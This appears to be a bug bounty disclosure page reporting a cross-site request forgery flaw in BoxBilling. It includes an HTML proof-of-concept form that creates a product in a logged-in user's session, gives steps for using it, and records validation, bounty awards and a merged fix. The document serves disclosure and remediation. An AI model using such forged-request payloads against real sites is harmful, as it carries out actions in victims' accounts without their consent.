Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling


Reported on

Apr 26th 2021

✍️ Description


🕵️‍♂️ Proof of Concept

i see whole boxbilling software is vulnerable to csrf bug . There is no protection for csrf attack

the csrf attack poc will be bellow code

<form action="" method="post" id="myForm">
<input type=hidden name=type value="custom">
<input type=hidden name=product_category_id value="1">
<input type=hidden name=title value="csrf">
  <input type="submit" value="Submit">

In this html code change your sitename and save the file as html . Now logged in into boxbilling account and open this file in your same browser and see a product is created using csrf attack every request is vulnerable for csrf attack

💥 Impact


Yağızhan validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Benjamin Aerni submitted a
a year ago
Benjamin Aerni
a year ago


Patch has been merged into BoxBilling's master branch

Timothy Webb Sr confirmed that a fix has been merged on 42cde7 a year ago
Benjamin Aerni has been awarded the fix bounty
to join this conversation